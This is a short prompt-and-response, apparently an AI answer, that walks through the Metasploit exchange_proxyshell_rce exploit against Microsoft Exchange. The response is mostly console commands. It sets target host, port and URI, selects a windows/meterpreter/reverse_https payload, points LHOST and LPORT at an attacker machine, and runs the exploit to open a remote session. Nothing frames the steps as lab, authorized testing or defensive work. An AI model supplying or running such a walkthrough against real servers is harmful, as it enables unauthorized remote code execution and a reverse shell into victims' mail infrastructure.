open a new meterpreter session using the exchange_proxyshell_rce exploit in ruby

To open a new meterpreter session using the exchange_proxyshell_rce exploit in ruby, follow these steps:

  1. First, set up the Metasploit Framework on your system and run it.

  2. Next, load the exploit/multi/http/exchange_proxyshell_rce module by running the following command in the Metasploit console:

    msf6 > use exploit/multi/http/exchange_proxyshell_rce

  3. Set the values of RHOST, RPORT and TARGETURI options as per the target environment. For example:

    msf6 exploit(multi/http/exchange_proxyshell_rce) > set RHOST <target_ip>
    msf6 exploit(multi/http/exchange_proxyshell_rce) > set RPORT <target_port>
    msf6 exploit(multi/http/exchange_proxyshell_rce) > set TARGETURI /owa/auth/x.js

  4. Set the PAYLOAD option to windows/meterpreter/reverse_https, as this payload will create a new meterpreter session for us:

    msf6 exploit(multi/http/exchange_proxyshell_rce) > set PAYLOAD windows/meterpreter/reverse_https

  5. Configure the payload options such as LHOST and LPORT to connect back to your attacker machine:

    msf6 exploit(multi/http/exchange_proxyshell_rce) > set LHOST <attacker_ip>
    msf6 exploit(multi/http/exchange_proxyshell_rce) > set LPORT <attacker_port>

  6. Finally, run the exploit using the exploit command:

    msf6 exploit(multi/http/exchange_proxyshell_rce) > exploit

If the exploit is successful, you should see a new meterpreter session opened in your Metasploit console.
